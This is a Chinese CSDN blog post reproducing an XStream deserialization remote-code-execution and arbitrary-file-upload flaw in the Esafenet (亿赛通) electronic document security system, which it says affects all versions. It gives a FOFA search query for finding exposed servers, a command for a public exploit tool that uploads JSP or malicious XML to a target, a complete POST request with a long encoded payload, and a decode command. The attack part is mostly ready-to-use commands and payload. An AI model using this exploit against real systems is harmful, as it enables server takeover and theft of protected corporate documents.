亿赛通电子文档安全管理系统 XStream反序列化任意文件上传

最新推荐文章于 2024-07-04 10:27:01 发布
最新推荐文章于 2024-07-04 10:27:01 发布
阅读量590 收藏 5
点赞数 6
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/135860803
版权
文章揭示了亿赛通-电子文档安全管理系统中的一个漏洞,用户可以利用FOFA工具上传恶意XML文件,导致远程代码执行。描述了复现攻击的过程和相关工具的使用方法。
摘要由CSDN通过智能技术生成

影响版本

全版本

网络空间测绘

FOFA:app=“亿赛通-电子文档安全管理系统”

在这里插入图片描述

复现


image.png
可使用以下工具直接上传JSP或自定义恶意XML。
https://github.com/0xf4n9x/CDGXStreamDeserRCE
CDGXStreamDeserRCE.jar

java -jar CDGXStreamDeserRCE.jar -uf C:\Download\xxxlx2.txt -t https://xxxx -p http://127.0.0.1:8080
                                      (本地上传的文件)   (目标地址)                                        

POST /CDGServer3/SystemService?command=GETSYSTEMINFO HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8
Content-Type: text/xml
Host: 
Content-Length: 4582

NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHEAIBHCEHALKGKJLIHHCLCCFBIKJPPCPFNEGBEFHIIEJLDLCIILGOJPCLALLDPIDJHNKDNPOGOMLIKGCBDNHJCLCGGGOMLKAEPNAGGHFCBGCALOHIGGKEHKPJNEBFGMJKCJFFDMMAHGEOFPIIPOIMALJHAFMLDLBBBOMCDBPJEHEJANCKCIEDBEIMIKONBEAMGGHGEFNOJGHKIELJBJLJCJFKCLOJEGIPPJOCNGCMBAKHADFNLEDMOJNMBGNGBMBFNPLIBGDCCNMDNDNOIPOECCPELCEDPGCNKGBDFKLJLNIJNAEFOPOLBLLCHOPIJCDNGEJGPMAFCFNLGKJDPKEBNDBEOIKINLEPIBJAGEBMEFKHPEKAPANDBGCGDBKKBJGFIOMHNPHOGAPDIFOBAMIGMNOFJAFJKNMFCBFNHAJELKBHCENAJDNEBNDCIOEOHAIOFKPEKJEPCDGPGGKENMHNOGKPMMADGIPOOJKHPGOIGDLNJFJGOIIEHCLGOLLGONJLFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHJGENFBCKCACMIMIPDDGJFANEEFFILNPFMEEAOGCOFPPBCGCMEJDEHJILGKBDAKCPJMFODBFIEGHLPBLLGOHGABBGLENANFJGAEHBANPEHDNHLNDHKPCKMEOCOBFEJLDGJFDBIOHBMICIEDOHCDJMLKFFEHDJGOBLKLMOJHGOHHMNEJBEKCEEPAMBJFGNCBDDEJPGNGJKKGMKPJIIHDCFFPFAOMOGDKFGMMDLILPCDNCCGACMNDPCEJCCOAMKOCNAFDNELOFMFJIEEJLDJKOEFDIGHLJGKEFCKBGGKCFFCIBIGBDFABJCFOCEDNJOJEBAEMFIEFPNBKGKGKFJDDEBDMKFFEKKAJOFPDMFBBALPJHINILPDEEPIMJOHPLDMOFMFCFMEAAJDNIGJGAFDMONIMNMIBKIGGCMLPFGDFNKOBLDKIHEDJJFJNEEBGMDICECOLIJNPJBMHOGMBKMILAIMJCICMDNBGMFBKPEGHFCHDCKJCKMDKFDLAGLDAHOCOEKIELNHNONOOFECAMDJNOOPNIMPMCNKHNGEJJMKFDPOGGNJLLJDAKHABCOCLGBMNIAMFEKBEMCGIEMDMGCOEDBDOMPKLMMMKLFPGEINCENPLOMMOIJHINAIPDNPKFIHHFMNKFEJDLHILCDEEPALCCOLILJFIAGEJILLHDFIELENBAKNPEBNADDDHBNCHBPNPOFBIDKOAAJFPEMGIKMBLFBDJNMGCBHPONCBDPELPPMPGDLCDOENPCBGGFLHANCPOGKPPEMBNOKJHBPPDHDLNKJLKCAJAAEPLFPJJFEBCPALCOMNOMCIKJCFBMAKIOFPNPLJMOAJDCNMKDCFIPHLFGMNDILAMLFFEGDMBCFAKAFBEFPFFHOLABOICHGGHFGLHPBIHODABLCBFCNBFKEODJINOLGPDHNLBOFMBALOFPBMGAIDOLJJJEELGAPIGBCHOJBEKLNBCOMCGIPNOOPPOEJHCOOKJHNELONFDGHDAPBKAMPGHHOGNCPKCGMEAMLKOLAIHLIADDJPCDJKHFAAAJNKKEKNNEJDOENAFGNAHGOHCFDLMGHMKHNKOEDFJMANPFJAKOILOJEOBMBLAOIOEFAOGJJKLOMGLACMBBMEEHIMNHGLCIFBGOKFCJAMFFIEFLLKOGEELMKMPMAKJMMOFKDJCFJGCGBDGLKDCNLGJGAHOBIPMPIFJPOIBLLAHHOBHHPGDILOENAEPPKPLEOPKMLDBCELDMFLPAJEGEIFJPMJBKEMDENGPNPCDLEDFKMKBGNLKPENBBHDMGGHNMEHHMMOOMGDOEFGANFJDDIJBHJLEBMIMILDFBLCLDIIAECKJHECJGCFJIPMHIIIDGMFLIAEPDEPJPILNDOLFFHNJFICIJOLGMIEMIBBEBPOHKJCADKMCBMHBMEGBLKCFJNAGLBNCFCJJIFOJPAEDJCPJGGMDKBDMPAHHPEFOJHCGAHLHMCBOJOEHDNJAJCOKBGKJGFHKGGHIIIIMLKMJEFELFABKCLONJPBLAMBBPHKJBEDJLLALIMLIPJFBNEGFDHPILGPCGADBNDGMNKNMOEKCAKDNFDHGPJPEJAOEHFEOKCJAMGMPCKKPJFCHECMAGIECDFLHGAJOGAELCDHNODFAALBHLGPGGFDKHINKKEGCDEDKNFHDAHMLLFMBJLPEFNGBDKIBJDFHNJKKJMLPCPJDHFNDBHGBLMMHPCFAKEDCHNOECHCKOBBOJDGKDHIFANKMLFHDPPCOBKAPMJPMOGCPJLEEMNIKPPHLNEEMIKKFGGCBBFNAMADDKMFBFDONINLMAKGKMGKKAIMAEBCJMKILBGAGIKLFBLONMCHNEHGLDNKJFELODIKPCJMDBNFDMIHAPHJLGAIDLFPKLDNMDGNLCOMMLKICBDAOFPIKEOIGAEBGOPPJKBCMKHIFNGMJCCOFFMCIMOFPLCCMNCFPHHDPAAJALBNBCOJEPFCJFJEFFNGOJKFLHGHJNBFPLODCFLBLBEKINLDNONLCLEPEHOGKFCEPKLABDJOOOABGBOBMMLLMBGOOPGDJMBEEGINKGIGCHIIILBJJFJJNIDDJCHDDLOHELOLEANPLEEHCHDOKLEIBHAPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJGKDNILPLLLHEJKJNGGDCADLNKNECJAGJLBFFAODGOMJNOPJIIEDEFBHLDLNAIBFDBJMJKFCLFOKBNCEKLKOEAEEDDMKNIEDBLJNKLAMJLOJFIJFMBOFNPMDEMBOHEDMJDGNEMGDAFFGJMPHLCGPAILFPPOLOAKOFJDMMILKLINJMIEDPFLIBNIPJMOOGNPLJNDJKJPNJKIKAMCKOMLKMELOCOFLDDJIEBGNBBLPMFNDGIHDEFAFHPJNAEPABGAOADKJMLCNLFMEPLIFKGJFPBBGHOCJDGPJFAKPIHNJJIPPBBIFJCIPGFNKBBLLGDOJGBPHKHELACOMFMJBCMEIALEBJEHDFLGPMMCEJIPIBIGGGLAMOKFKMKGJACLLNNHIPDJLHPNBJFMLBINBEOBJMLPILNJNNBLHMDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNGFPFLJJMGANGAOLPGIFAFNEEACNKMJLFHEKBBILILPEGMIODENBNOOCENDGLDCKBGEFDCL

存在的响应包
image.png

java -jar CDGXStreamDeserRCE.jar -d FEPCCCLCENHIPOAFPAPDDFCGEAPNMDBMOJPMJAKKNPHOKIKIDCBPHEGKLDGNHCBDEIMODEKMKPFBAIMMNLOJJKMIICLAPJAAFGNGAKFBMPKPJMOIKODEJJMHJCCHKBMFMMFDLOMDPABOJCEAPOFDCPMKGDHFNBBIMCIPAMMIIANFPAJHFAABLLLANNIDAGNKOHONJGFGBKHFDMCLJIMICBHBJEIAAIMACN

image.png

qq_36334672
关注
  • 6
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
某赛通电子文档安全管理系统XStream反序列化RCE
weixin_43567873的博客
03-07 151
某赛通电子文档安全管理系统XStream反序列化RCE
亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口存在任意文件上传漏洞 附POC
nnn2188185的博客
11-23 339
亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口存在任意文件上传漏洞 附POC
亿赛通电子文档安全管理系统 RCE漏洞
holyxp的博客
08-21 2043
亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全
亿赛通电子文档安全管理系统 XStream反序列化 RCE
qq_36334672的博客
01-26 458
【代码】亿赛通电子文档安全管理系统 XStream反序列化 RCE。
重点OA系统漏洞利用综合工具箱
Fly_鹏程万里
05-21 388
I-Wanna-Get-All是基于Apt-T00ls二次开发工具,I Wanna Get All 安全工具, 严禁一切未授权漏洞扫描攻击使用工具前建议判断系统指纹框架,部分漏洞为接口探测存活判断是否成功,实际利用情况以执行情况为准。
Goby 漏洞发布| 亿赛通电子文档安全管理系统 file uploadFile 接口文件上传漏洞_电子文档安全管理系统任意文件上传漏洞(2)
qd520_1314的博客
04-15 649
亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全
亿赛通电子文档安全管理系统 文件上传
08-17 1186
亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全
2023-0Day(漏洞检测Tools)HW-漏洞挖掘-src
qq1140037586的博客
08-23 1346
为更好帮助师傅们日常安全巡检期间及攻防演练期间进行安全自查检测,编写了2023公开漏洞的检测工具。
基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用
07-01
亿赛通电子文档安全管理系统存在XStream反序列化远程代码执行漏洞,攻击者可利用该漏洞对服务器上传任意文件,进而控制服务器权限。 使用 帮助信息 $ java -jar CDGXStreamDeserRCE.jar 亿赛通电子文档安全管理...
亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用.zip
06-23
该资源内项目源码是个人的课程设计、毕业设计,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请...
亿赛通电子文档安全管理系统V5.0--系统安装手册.docx
01-16
亿赛通电子文档安全管理系统V5.0--系统安装手册.docx
亿赛通电子文档安全管理系统-rce-exp.zip
06-23
该资源内项目源码是个人的课程设计、毕业设计,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请...
亿赛文档安全管理系统 (2).pdf
03-12
..
探索CDGXStreamDeserRCE:一款强大的序列化反序列化漏洞利用框架
gitblog_00043的博客
04-07 267
探索CDGXStreamDeserRCE:一款强大的序列化反序列化漏洞利用框架 项目地址:https://gitcode.com/0xf4n9x/CDGXStreamDeserRCE 在网络安全的世界里,序列化和反序列化是常见的数据交换过程,但它们也可能成为攻击者的切入点。CDGXStreamDeserRCE是一个精心设计的工具,专注于帮助安全研究人员和渗透测试人员分析和利用Java中的反序列化...
亿赛通电子文档安全管理系统任意文件上传漏洞(2023-HW)
holyxp的博客
08-17 2467
亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全
OA检测工具-I-Wanna-Get-All(四)
siu~
02-26 522
基于Apt-T00ls二次开发工具,I Wanna Get All 安全工具, 严禁一切未授权漏洞扫描攻击。使用工具前建议判断系统指纹框架,部分漏洞为接口探测存活判断是否成功,实际利用情况以执行情况为准。
亿赛通电子文档安全管理系统dataimport远程命令执行漏洞
chaojixiaojingang
08-06 7456
1.漏洞描述 亿赛通电子文档安全管理系统dataimport存在远程命令执行漏洞,攻击者通过构造特定的请求可执行任意命令。 2.网络资产查找 FOFA:title="电子文档安全管理系统" 3.POC import requests import sys import random import re import base64 import time from requests.packages.urllib3.exceptions import InsecureRequest...
[图解]SysML和EA建模住宅安全系统-09-流程指南·分析系统需求
最新发布
rolt的专栏
07-04 977
然后这一步,你看,这里有个决策点
亿赛通加密的文件如何解密
06-10
亿赛通(Esaton)是一种国产加密软件,用于加密文件、磁盘、分区等。如果您想要解密亿赛通加密的文件,需要使用亿赛通加密软件进行解密。 具体操作步骤如下: 1. 首先,您需要安装亿赛通加密软件,并打开软件。 2. 在软件界面上,选择“解密文件”功能。 3. 在解密文件界面上,点击“选择文件”按钮,选择您需要解密的文件。 4. 输入正确的解密密码,点击“解密”按钮。 5. 等待解密完成,解密完成后,您可以在指定的解密路径下找到解密后的文件。 需要注意的是,亿赛通加密软件的加密算法比较强,如果您忘记了解密密码,那么就无法解密文件。因此,在使用亿赛通加密软件加密文件时,一定要妥善保管好解密密码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值